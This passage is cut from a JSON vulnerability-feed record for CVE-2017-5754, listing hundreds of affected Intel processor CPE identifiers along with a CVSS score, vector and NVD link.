"cpe:/h:intel:xeon_e5_2418l_v2:-", "cpe:/h:intel:xeon_e5:2670_v2", "cpe:/h:intel:xeon:x6550", "cpe:/h:intel:xeon_gold:6148f", "cpe:/h:intel:core_i5:520e", "cpe:/h:intel:xeon_e5:2670", "cpe:/h:intel:xeon_e3_1220_v3:-", "cpe:/h:intel:xeon_platinum:8180", "cpe:/h:intel:celeron_n:n2910", "cpe:/h:intel:xeon_e5_2430_v2:-", "cpe:/h:intel:core_i5:3570k", "cpe:/h:intel:xeon_e5:2695_v4", "cpe:/h:intel:core_i3:330e", "cpe:/h:intel:core_i5:655k", "cpe:/h:intel:xeon_platinum:8160t", "cpe:/h:intel:atom_z:z3570", "cpe:/h:intel:xeon_e3_1278l_v4:-", "cpe:/h:intel:core_i5:6260u", "cpe:/h:intel:core_i5:4210y", "cpe:/h:intel:xeon_e7:8870", "cpe:/h:intel:core_i7:3667u", "cpe:/h:intel:core_i3:4100e", "cpe:/h:intel:core_i7:7920hq", "cpe:/h:intel:core_i7:4650u", "cpe:/h:intel:pentium_j:j2850", "cpe:/h:intel:xeon_e3_1125c:-", "cpe:/h:intel:core_i5:4670s", "cpe:/h:intel:xeon_e5:2699_v3", "cpe:/h:intel:celeron_j:j1850", "cpe:/h:intel:core_i7:4770hq", "cpe:/h:intel:core_i7:4550u", "cpe:/h:intel:core_i5:4210u", "cpe:/h:intel:core_i5:3339y", "cpe:/h:intel:xeon_e7:4809_v2", "cpe:/h:intel:xeon_e3_1285_v3:-", "cpe:/h:intel:core_i5:650", "cpe:/h:intel:xeon_e3_1280_v5:-", "cpe:/h:intel:core_i5:3210m", "cpe:/h:intel:core_i7:3740qm", "cpe:/h:intel:core_i3:2367m", "cpe:/h:intel:core_i3:6300t", "cpe:/h:intel:xeon:x5647", "cpe:/h:intel:xeon_e7:2860", "cpe:/h:intel:core_i7:4910mq", "cpe:/h:intel:celeron_n:n3350", "cpe:/h:intel:core_i5:8250u", "cpe:/h:intel:xeon_e5:2698_v3", "cpe:/h:intel:xeon_e5_2650l_v2:-", "cpe:/h:intel:core_i7:2700k", "cpe:/h:intel:core_i7:620le", "cpe:/h:intel:core_i3:4350", "cpe:/h:intel:xeon_e3_1505m_v5:-", "cpe:/h:intel:xeon_e5:4650", "cpe:/h:intel:atom_e:e3815", "cpe:/h:intel:core_i7:3610qe", "cpe:/h:intel:core_i5:560um", "cpe:/h:intel:xeon_e5_2648l_v3:-", "cpe:/h:intel:core_i5:4402ec", "cpe:/h:intel:atom_z:z3775", "cpe:/h:intel:xeon_e3_12201:-", "cpe:/h:intel:xeon_e5_1630_v4:-", "cpe:/h:intel:core_i5:2510e", "cpe:/h:intel:celeron_n:n2810", "cpe:/h:intel:core_i7:5557u", "cpe:/h:intel:core_i7:4700eq", "cpe:/h:intel:xeon_phi:7210", "cpe:/h:intel:xeon_e7:4850_v2", "cpe:/h:intel:atom_z:z3735d", "cpe:/h:intel:core_i5:3337u", "cpe:/h:intel:core_i5:4590s", "cpe:/h:intel:core_i7:2600s", "cpe:/h:intel:core_m:5y71", "cpe:/h:intel:core_i3:4130", "cpe:/h:intel:xeon_e7:4809_v4", "cpe:/h:intel:xeon_e5_2418l_v3:-", "cpe:/h:intel:atom_z:z3735g", "cpe:/h:intel:core_i7:7700t", "cpe:/h:intel:xeon_silver:4116", "cpe:/h:intel:core_i7:7y75", "cpe:/h:intel:xeon:e5506", "cpe:/h:intel:atom_c:c2508", "cpe:/h:intel:xeon_e7:8890_v3", "cpe:/h:intel:core_i7:680um", "cpe:/h:intel:xeon_e3_1240l_v5:-", "cpe:/h:intel:xeon_gold:6140", "cpe:/h:intel:core_i7:2630qm", "cpe:/h:intel:xeon_e5_2450l_v2:-", "cpe:/h:intel:xeon_phi:7230", "cpe:/h:intel:core_i3:4330", "cpe:/h:intel:core_i5:670", "cpe:/h:intel:xeon:l5640", "cpe:/h:intel:xeon_phi:7285", "cpe:/h:intel:xeon_phi:7290f", "cpe:/h:intel:core_i7:2649m", "cpe:/h:intel:atom_x3:c3200rk", "cpe:/h:intel:xeon_e5:4640_v4", "cpe:/h:intel:xeon_e5_2618l_v4:-", "cpe:/h:intel:xeon_e5_2609_v3:-", "cpe:/h:intel:core_i5:5675c", "cpe:/h:intel:core_i5:4570te", "cpe:/h:intel:core_i3:2105", "cpe:/h:intel:core_i3:2348m", "cpe:/h:intel:atom_z:z2760", "cpe:/h:intel:core_i3:2310e", "cpe:/h:intel:core_i5:5575r", "cpe:/h:intel:xeon_e3_1245_v2:-", "cpe:/h:intel:xeon_e7:8893_v3", "cpe:/h:intel:core_i5:560m", "cpe:/h:intel:core_i5:4670k", "cpe:/h:intel:core_i5:6442eq", "cpe:/h:intel:core_i7:5775c", "cpe:/h:intel:core_i3:380m", "cpe:/h:intel:core_i3:2100", "cpe:/h:intel:core_i7:4770r", "cpe:/h:intel:xeon_e3_1268l_v3:-", "cpe:/h:intel:core_i5:4202y", "cpe:/h:intel:xeon_e5:2699r_v4", "cpe:/h:intel:core_i5:661", "cpe:/h:intel:core_i7:2637m", "cpe:/h:intel:xeon_e3_1285l_v4:-", "cpe:/h:intel:xeon_e5:2699_v4", "cpe:/h:intel:core_i7:4790", "cpe:/h:intel:xeon_e3_1245_v3:-", "cpe:/h:intel:xeon_e3_1125c_v2:-", "cpe:/h:intel:xeon_e5_2640:-", "cpe:/h:intel:core_i3:370m", "cpe:/h:intel:xeon_silver:4114", "cpe:/h:intel:celeron_n:n2920", "cpe:/h:intel:xeon_gold:5119t", "cpe:/h:intel:xeon_e5_2648l_v4:-", "cpe:/h:intel:core_i5:450m", "cpe:/h:intel:celeron_n:n4100", "cpe:/h:intel:xeon_e3_1265l_v2:-", "cpe:/h:intel:atom_c:c3338", "cpe:/h:intel:core_i7:2960xm", "cpe:/h:intel:core_i5:2500s", "cpe:/h:intel:core_i7:3720qm", "cpe:/h:intel:core_i7:960", "cpe:/h:intel:core_i5:4260u", "cpe:/h:intel:core_i7:7700k", "cpe:/h:intel:xeon_e5:4655_v4", "cpe:/h:intel:xeon_e5_2608l_v4:-", "cpe:/h:intel:xeon_e7:2890_v2", "cpe:/h:intel:core_i3:6102e", "cpe:/h:intel:core_i5:4310m", "cpe:/h:intel:xeon_e5:4607", "cpe:/h:intel:xeon_e3:1578l_v5", "cpe:/h:intel:core_i5:8600k", "cpe:/h:intel:xeon:l5520", "cpe:/h:intel:core_i7:4980hq", "cpe:/h:intel:xeon_e7:4809_v3", "cpe:/h:intel:xeon_e5:2665", "cpe:/h:intel:core_i5:6600k", "cpe:/h:intel:xeon_e5_1650_v2:-", "cpe:/h:intel:xeon_e5_2603:-", "cpe:/h:intel:xeon_e3_1265l_v4:-", "cpe:/h:intel:xeon:ec5539", "cpe:/h:intel:core_i3:3240t", "cpe:/h:intel:core_i5:4310u", "cpe:/h:intel:core_i5:3330", "cpe:/h:intel:core_i7:3687u", "cpe:/h:intel:xeon_e5:4607_v2", "cpe:/h:intel:atom_e:e3845", "cpe:/h:intel:core_i7:4760hq", "cpe:/h:intel:atom_c:c3850", "cpe:/h:intel:core_i3:2125", "cpe:/h:intel:pentium_j:j3710", "cpe:/h:intel:xeon:x5550", "cpe:/h:intel:xeon_e-1105c:-", "cpe:/h:intel:xeon_e3_1220_v5:-", "cpe:/h:intel:atom_c:c2516", "cpe:/h:intel:core_i7:930", "cpe:/h:intel:core_i7:5850hq", "cpe:/h:intel:xeon_e7:8860_v3", "cpe:/h:intel:core_i3:550", "cpe:/h:intel:core_i5:2450p", "cpe:/h:intel:core_i7:4712mq", "cpe:/h:intel:core_i5:4460t", "cpe:/h:intel:core_i7:5700hq", "cpe:/h:intel:xeon_e5_1680_v3:-", "cpe:/h:intel:core_i7:2820qm", "cpe:/h:intel:atom_z:z3530", "cpe:/h:intel:xeon_e3_1220_v6:-", "cpe:/h:intel:xeon_gold:5115", "cpe:/h:intel:xeon_e5_2630_v2:-", "cpe:/h:intel:atom_c:c3558", "cpe:/h:intel:xeon_e5:2690", "cpe:/h:intel:core_i7:8700", "cpe:/h:intel:core_i7:7567u", "cpe:/h:intel:xeon_gold:6150", "cpe:/h:intel:xeon_e3_1258l_v4:-", "cpe:/h:intel:xeon_e5_2628l_v2:-", "cpe:/h:intel:xeon_e5:4669_v4", "cpe:/h:intel:core_i7:2657m", "cpe:/h:intel:core_i7:7600u", "cpe:/h:intel:atom_z:z3770", "cpe:/h:intel:xeon_e5:2690_v3", "cpe:/h:intel:core_i7:2629m", "cpe:/h:intel:core_i7:3520m", "cpe:/h:intel:core_i7:4785t", "cpe:/h:intel:xeon:x5690", "cpe:/h:intel:atom_c:c2550", "cpe:/h:intel:core_i3:6006u", "cpe:/h:intel:core_m:5y51", "cpe:/h:intel:core_i7:2760qm", "cpe:/h:intel:xeon_silver:4109t", "cpe:/h:intel:core_i3:6157u", "cpe:/h:intel:xeon_e5_1680_v4:-", "cpe:/h:intel:xeon_gold:6136", "cpe:/h:intel:xeon_e5:2667_v4", "cpe:/h:intel:xeon_e7:8860", "cpe:/h:intel:celeron_n:n2815", "cpe:/h:intel:xeon:e7520", "cpe:/h:intel:xeon_e5_1428l:-", "cpe:/h:intel:core_i3:2350m", "cpe:/h:intel:xeon_e3:1575m_v5", "cpe:/h:intel:xeon_e5:2658a_v3", "cpe:/h:intel:xeon:x3480", "cpe:/h:intel:xeon_e5:2670_v3", "cpe:/h:intel:atom_z:z3736f", "cpe:/h:intel:core_i3:4350t", "cpe:/h:intel:xeon_e5_2650_v4:-", "cpe:/h:intel:atom_c:c2758", "cpe:/h:intel:pentium_n:n3700", "cpe:/h:intel:xeon:x3440", "cpe:/h:intel:core_i7:870", "cpe:/h:intel:core_i5:4288u", "cpe:/h:intel:xeon_e5:2690_v2", "cpe:/h:intel:core_i7:7700hq", "cpe:/h:intel:xeon_silver:4110", "cpe:/h:intel:atom_z:z2520", "cpe:/h:intel:xeon:e5607", "cpe:/h:intel:core_i5:4302y", "cpe:/h:intel:xeon_platinum:8176", "cpe:/h:intel:core_i3:4330te", "cpe:/h:intel:core_i3:3115c", "cpe:/h:intel:core_i7:3820qm", "cpe:/h:intel:xeon_e3_1280_v6:-", "cpe:/h:intel:core_i3:4370", "cpe:/h:intel:xeon_e3:1565l_v5", "cpe:/h:intel:core_i7:4700ec", "cpe:/h:intel:xeon:x3450", "cpe:/h:intel:xeon:e5630", "cpe:/h:intel:xeon_e3_1275_v3:-", "cpe:/h:intel:xeon_bronze_3106:-", "cpe:/h:intel:core_i3:2102", "cpe:/h:intel:core_i5:3550s", "cpe:/h:intel:xeon:l5609", "cpe:/h:intel:xeon_e3_1241_v3:-", "cpe:/h:intel:atom_z:z3785", "cpe:/h:intel:xeon_e5_2643_v3:-", "cpe:/h:intel:celeron_n:n2806", "cpe:/h:intel:xeon_e3_1275_v2:-", "cpe:/h:intel:core_i7:5500u", "cpe:/h:intel:core_i5:4300u", "cpe:/h:intel:core_i5:4570s", "cpe:/h:intel:core_i7:2720qm", "cpe:/h:intel:celeron_n:n3050", "cpe:/h:intel:xeon_platinum:8158", "cpe:/h:intel:xeon:w3680", "cpe:/h:intel:xeon_e5:2660_v4", "cpe:/h:intel:core_i7:920", "cpe:/h:intel:core_i3:4010u", "cpe:/h:intel:core_i3:4030u", "cpe:/h:intel:core_i7:8550u", "cpe:/h:intel:xeon_e5:4650_v3", "cpe:/h:intel:atom_c:c2338", "cpe:/h:intel:core_i3:6100", "cpe:/h:intel:xeon:l5530", "cpe:/h:intel:xeon_e7:8893_v4", "cpe:/h:intel:core_i3:6100t", "cpe:/h:intel:core_i5:4210m", "cpe:/h:intel:atom_c:c3950", "cpe:/h:intel:core_i7:7660u", "cpe:/h:intel:atom_x3:c3235rk", "cpe:/h:intel:xeon_e5:4669_v3", "cpe:/h:intel:xeon:ec5509", "cpe:/h:intel:core_i5:750s", "cpe:/h:intel:xeon_e7:4807", "cpe:/h:intel:xeon_e3_1245_v6:-", "cpe:/h:intel:core_i7:4765t", "cpe:/h:intel:xeon_e5_2609:-", "cpe:/h:intel:xeon_e5:2695_v3", "cpe:/h:intel:core_i5:2550k", "cpe:/h:intel:core_i5:2310", "cpe:/h:intel:xeon:l3426"], "id": "CVE-2017-5754", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5754", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2603:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6126:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3450:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2518:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5630:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4657l_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1680_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6148:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3308:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4640_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1585l_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8170m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6126f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1285_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3590:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1231_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8880l_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8860_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2618l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4603:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j3060:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2695_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4610:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2350:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2648l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6138t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2430l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6142f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3000:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4650_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4669_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2910:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1241_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4628l_v4:*:*:*:*:*:*:*", "cpe:2.3:h:arm:cortex-a:75:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4669_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2680_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8160m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1268l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1515m_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2643_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1660:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5120t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1125c_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4620_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8867_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2850_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8880l_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6130t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3770:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7230f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1620_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7210:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2860:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5502:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1285_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2428l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4820_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1246_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8890_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5560:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1225_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8860:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2658a_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5675:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1245_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2603_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1270_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4610_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2609_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_12201:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2640_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8830:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2450l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1280_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2670_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2810:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7250:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3740d:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4610_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l3426:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2690:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1225_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3785:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3858:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8160:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1235l_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8164:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2695_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5638:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3265rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4650l:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4624l_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3745:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4116t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1280_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8880_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2699r_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3950:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x7542:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3827:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2695_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8870_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3758:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4112:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8850_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3826:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j4005:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4620:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1575m_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3445:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2438l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4603_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3958:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2620_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n4100:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5504:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2820:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8160f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e7520:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8867l:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1578l_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1225:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2450_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2448l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8880_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e7540:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8893_v3:*:*:*:*:*:*:*", 